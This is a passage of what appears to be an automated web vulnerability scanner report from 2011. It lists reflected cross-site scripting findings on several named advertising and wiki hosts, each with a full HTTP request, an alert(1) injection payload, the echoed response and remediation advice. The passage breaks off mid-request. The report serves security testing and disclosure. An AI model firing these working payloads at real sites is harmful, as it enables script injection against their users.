Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x90/jx/ss/a/L26/1959749775/Top1/USNetwork/BCN2011030303_003_Dominos/dominos_cpc_apr_728.html/72634857383032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Tue, 19 Apr 2011 20:03:09 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FD1080344A4046555CB1ACB98C897FBC; Path=/
Connection: keep-alive
Content-Length: 8641


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x
...[SNIP]...
307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775?",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=134&advId=2356384&campId=5396397&chanId=239414132b7d9e"-alert(1)-"bdc978586f7&placementId=62214207&pubId=1036126",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.debug==="true");var z=2000;var A={INFO:"info",LOG:"log",DIR:"dir"};var k=function(F,H,D){if(typ
...[SNIP]...

3.283. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89bc6"-alert(1)-"70137643fe4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=134&advId=2356384&campId=5396397&chanId=239414132&placementId=62214207&pubId=1036126&89bc6"-alert(1)-"70137643fe4=1 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x90/jx/ss/a/L26/1959749775/Top1/USNetwork/BCN2011030303_003_Dominos/dominos_cpc_apr_728.html/72634857383032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Tue, 19 Apr 2011 20:03:09 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=21B1BE1ED3A87016416FACEF53861DE9; Path=/
Connection: keep-alive
Content-Length: 8644


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x
...[SNIP]...
rd=1959749775?",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=134&advId=2356384&campId=5396397&chanId=239414132&placementId=62214207&pubId=1036126&89bc6"-alert(1)-"70137643fe4=1",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.debug==="true");var z=2000;var A={INFO:"info",LOG:"log",DIR:"dir"};var k=function(F,H,D){if(typeof H==="undefined"){H=A.INFO;}if
...[SNIP]...

3.284. http://pixel.adsafeprotected.com/jspix [placementId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the placementId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13e10"-alert(1)-"ffa02563ec8 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=134&advId=2356384&campId=5396397&chanId=239414132&placementId=6221420713e10"-alert(1)-"ffa02563ec8&pubId=1036126 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x90/jx/ss/a/L26/1959749775/Top1/USNetwork/BCN2011030303_003_Dominos/dominos_cpc_apr_728.html/72634857383032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Tue, 19 Apr 2011 20:03:09 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C985B7FA5991596DFB034D9DA273D364; Path=/
Connection: keep-alive
Content-Length: 8641


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x
...[SNIP]...
s_cpc_apr_728;ord=1959749775?",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=134&advId=2356384&campId=5396397&chanId=239414132&placementId=6221420713e10"-alert(1)-"ffa02563ec8&pubId=1036126",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.debug==="true");var z=2000;var A={INFO:"info",LOG:"log",DIR:"dir"};var k=function(F,H,D){if(typeof H==="undefined"){
...[SNIP]...

3.285. http://pixel.adsafeprotected.com/jspix [pubId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the pubId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71116"-alert(1)-"f92110ae5 was submitted in the pubId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=134&advId=2356384&campId=5396397&chanId=239414132&placementId=62214207&pubId=103612671116"-alert(1)-"f92110ae5 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x90/jx/ss/a/L26/1959749775/Top1/USNetwork/BCN2011030303_003_Dominos/dominos_cpc_apr_728.html/72634857383032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Tue, 19 Apr 2011 20:03:09 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8E2733FC94ED1B7A52E98C8CA0FAC74F; Path=/
Connection: keep-alive
Content-Length: 8639


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x
...[SNIP]...
ord=1959749775?",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=134&advId=2356384&campId=5396397&chanId=239414132&placementId=62214207&pubId=103612671116"-alert(1)-"f92110ae5",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.debug==="true");var z=2000;var A={INFO:"info",LOG:"log",DIR:"dir"};var k=function(F,H,D){if(typeof H==="undefined"){H=A.INFO;}if(p
...[SNIP]...

3.286. https://pixel.fetchback.com/serve/fb/pdc [name parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The value of the name request parameter is copied into the HTML document as plain text between tags. The payload a357e<x%20style%3dx%3aexpression(alert(1))>1c33ad700db was submitted in the name parameter. This input was echoed as a357e<x style=x:expression(alert(1))>1c33ad700db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /serve/fb/pdc?cat=&name=landinga357e<x%20style%3dx%3aexpression(alert(1))>1c33ad700db&sid=782 HTTP/1.1
Host: pixel.fetchback.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 02:15:52 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1303179352_1660:29; Domain=.fetchback.com; Expires=Sun, 17-Apr-2016 02:15:52 GMT; Path=/
Set-Cookie: uid=1_1303179352_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sun, 17-Apr-2016 02:15:52 GMT; Path=/
Set-Cookie: kwd=1_1303179352; Domain=.fetchback.com; Expires=Sun, 17-Apr-2016 02:15:52 GMT; Path=/
Set-Cookie: sit=1_1303179352_782:29:29; Domain=.fetchback.com; Expires=Sun, 17-Apr-2016 02:15:52 GMT; Path=/
Set-Cookie: cre=1_1303179352; Domain=.fetchback.com; Expires=Sun, 17-Apr-2016 02:15:52 GMT; Path=/
Set-Cookie: bpd=1_1303179352; Domain=.fetchback.com; Expires=Sun, 17-Apr-2016 02:15:52 GMT; Path=/
Set-Cookie: apd=1_1303179352; Domain=.fetchback.com; Expires=Sun, 17-Apr-2016 02:15:52 GMT; Path=/
Set-Cookie: scg=1_1303179352; Domain=.fetchback.com; Expires=Sun, 17-Apr-2016 02:15:52 GMT; Path=/
Set-Cookie: ppd=1_1303179352; Domain=.fetchback.com; Expires=Sun, 17-Apr-2016 02:15:52 GMT; Path=/
Set-Cookie: afl=1_1303179352; Domain=.fetchback.com; Expires=Sun, 17-Apr-2016 02:15:52 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 19 Apr 2011 02:15:52 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91

<!-- campaign : 'landinga357e<x style=x:expression(alert(1))>1c33ad700db' *not* found -->

3.287. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81dbd'%3balert(1)//e680994464c was submitted in the admeld_callback parameter. This input was echoed as 81dbd';alert(1)//e680994464c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld_sync?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match81dbd'%3balert(1)//e680994464c HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/728x90/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/d56a8ca8-fcd6-4f11-be56-d400a24d3999?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349044
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: subID="{}"; impressions="{\"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]}"; camp_freq_p1="eJzjkuHYeZ9ZgFFi1vy1b1kUGDVmNax/y2LAaAHmAwCZegsN"; io_freq_p1="eJzjEubY6yLAKDFr/tq3LAaMFmAaAEN9B2c="; dp_rec="{\"2\": 1303072666}"; uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; segments_p1="eJzjYuF4+ogRAATqAd8="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Thu, 21 Apr 2011 01:28:13 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Thu, 21-Apr-2011 01:27:53 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 209

document.write('<img width="0" height="0" src="http://tag.admeld.com/match81dbd';alert(1)//e680994464c?admeld_adprovider_id=300&external_user_id=8218888f-9a83-4760-bd14-33b4666730c0&Expiration=1303781293"/>
...[SNIP]...

3.288. http://poponthepop.us.intellitxt.com/al.asp [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://poponthepop.us.intellitxt.com
Path:   /al.asp

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b8d8a%3balert(1)//f1d879267e4 was submitted in the jscallback parameter. This input was echoed as b8d8a;alert(1)//f1d879267e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /al.asp?ts=20110421012512&cc=us&hk=1&ipid=21220&mh=23fbc92b375044f6e48954aaf7ff6be1&pvm=2b40ab9f4209a04c1b7597f4878f8779&pvu=1FD6D8A38F2140AF8F8ECC153C537616&rcc=us&so=0&prf=ll%3A396%7Cintl%3A1796%7Cpreprochrome%3A3%7Cgetconchrome%3A22%7Cadvint%3A1825%7Cadvl%3A1825%7Ctl%3A1825&jscallback=$iTXT.js.callback1b8d8a%3balert(1)//f1d879267e4 HTTP/1.1
Host: poponthepop.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://poponthepop.com/2011/04/lindsay-lohan-loses-victoria-gotti-role/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7KQEAAAEvdagVQQA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7KQEAAAEvdagVQQA-; Domain=.intellitxt.com; Expires=Mon, 20-Jun-2011 01:33:58 GMT; Path=/
Content-Type: text/javascript
Content-Length: 65
Date: Thu, 21 Apr 2011 01:33:58 GMT
Age: 0
Connection: keep-alive

try{$iTXT.js.callback1b8d8a;alert(1)//f1d879267e4();}catch(e){}

3.289. http://poponthepop.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://poponthepop.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7bce9'-alert(1)-'538c5377ece was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /intellitxt/front.asp?ipid=21220&7bce9'-alert(1)-'538c5377ece=1 HTTP/1.1
Host: poponthepop.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://poponthepop.com/2011/04/lindsay-lohan-loses-victoria-gotti-role/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7JQEAAAEvZdzqjQA-

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7KQIAAAEvdavz8QA-; Domain=.intellitxt.com; Expires=Mon, 20-Jun-2011 01:28:14 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7KQIAAAEvdavz8QA-; Domain=.intellitxt.com; Expires=Mon, 20-Jun-2011 01:28:14 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 11428
Date: Thu, 21 Apr 2011 01:28:14 GMT
Age: 0
Connection: keep-alive

document.itxtDisabled=1;
document.itxtDebugOn=false;
if(document.itxtDisabled){
document.itxtInProg=1;
if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT
...[SNIP]...
"http://b.scorecardresearch.com/b?c1=8&c2=6000002&c3=30000&c4=&c5=&c6=&c15=&cv=1.3&cj=1&rn=20110421012814";})();$iTXT.js.serverUrl='http://poponthepop.us.intellitxt.com';$iTXT.js.pageQuery='ipid=21220&7bce9'-alert(1)-'538c5377ece=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();};
}

3.290. http://poponthepop.us.intellitxt.com/v4/init [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://poponthepop.us.intellitxt.com
Path:   /v4/init

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2db01%3balert(1)//1dfaee7166e was submitted in the jscallback parameter. This input was echoed as 2db01;alert(1)//1dfaee7166e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1303349111247&pagecl=62730&fv=10&muid=&refurl=http%3A%2F%2Fpoponthepop.com%2F2011%2F04%2Flindsay-lohan-loses-victoria-gotti-role%2F&ipid=21220&jscallback=$iTXT.js.callback02db01%3balert(1)//1dfaee7166e HTTP/1.1
Host: poponthepop.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://poponthepop.com/2011/04/lindsay-lohan-loses-victoria-gotti-role/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7KQEAAAEvdagVQQA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 6500
Date: Thu, 21 Apr 2011 01:33:38 GMT
Age: 0
Connection: keep-alive

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
arams.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');$iTXT.data.Dom.detectSearchEngines();try{$iTXT.js.callback02db01;alert(1)//1dfaee7166e({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}

3.291. http://poponthepop.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://poponthepop.us.intellitxt.com
Path:   /v4/init

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c33fc"-alert(1)-"9c05fb4ee52 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1303349111247&pagecl=62730&fv=10&muid=&refurl=http%3A%2F%2Fpoponthepop.com%2F2011%2F04%2Flindsay-lohan-loses-victoria-gotti-role%2F&ipid=21220&jscallback=$iTXT.js.callback0&c33fc"-alert(1)-"9c05fb4ee52=1 HTTP/1.1
Host: poponthepop.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://poponthepop.com/2011/04/lindsay-lohan-loses-victoria-gotti-role/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7KQEAAAEvdagVQQA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 6481
Date: Thu, 21 Apr 2011 01:34:21 GMT
Age: 0
Connection: keep-alive

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
|undefined==$iTXT.glob.dbgParams){$iTXT.glob.dbgParams=new $iTXT.data.Param($iTXT.glob.dbParams,undefined,undefined,'DEBUG');}$iTXT.glob.dbgParams.set({"pagecl":"62730","fv":"10","ts":"1303349111247","c33fc"-alert(1)-"9c05fb4ee52":"1","dma":623,"POSTCODE":"75207","user-agent":"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16","REGIONNAME":"Texas","muid":""
...[SNIP]...

3.292. http://projects.webappsec.org/w/page-revisions/13246986/Web-Application-Security-Scanner-Evaluation-Criteria [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://projects.webappsec.org
Path:   /w/page-revisions/13246986/Web-Application-Security-Scanner-Evaluation-Criteria

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57c86"><img%20src%3da%20onerror%3dalert(1)>64ff6fcbc40 was submitted in the REST URL parameter 4. This input was echoed as 57c86"><img src=a onerror=alert(1)>64ff6fcbc40 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /w/page-revisions/13246986/Web-Application-Security-Scanner-Evaluation-Criteria57c86"><img%20src%3da%20onerror%3dalert(1)>64ff6fcbc40 HTTP/1.1
Host: projects.webappsec.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=133238479.1298670519.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pbj=c141224b73feb9193565e6eeb03e001298670485; pb_perfmon=deleted; __utma=133238479.1282775871.1298670519.1298670519.1298670519.1; __utmc=133238479; __qca=P0-1048600453-1298670520461; __utmb=133238479.1.10.1298670519;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Sat, 26 Feb 2011 02:16:22 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Frame-Options: deny
Expires: Fri, 25 Feb 2011 02:16:21 GMT
Cache-Control: no-cache
Content-Length: 25531

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
<meta http-equiv="cont
...[SNIP]...
<a href="http://projects.webappsec.org/w/page-revisions/13246986/Web-Application-Security-Scanner-Evaluation-Criteria57c86"><img src=a onerror=alert(1)>64ff6fcbc40?show_all=1">
...[SNIP]...

3.293. http://projects.webappsec.org/w/page-revisions/13246986/a [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://projects.webappsec.org
Path:   /w/page-revisions/13246986/a

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8641"><img%20src%3da%20onerror%3dalert(1)>0f2d26e32b6 was submitted in the REST URL parameter 4. This input was echoed as b8641"><img src=a onerror=alert(1)>0f2d26e32b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /w/page-revisions/13246986/ab8641"><img%20src%3da%20onerror%3dalert(1)>0f2d26e32b6 HTTP/1.1
Host: projects.webappsec.org
Proxy-Connection: keep-alive
Referer: http://projects.webappsec.org/w/page-revisions/13246986/Web-Application-Security-Scanner-Evaluation-Criteria57c86%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3E64ff6fcbc40
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
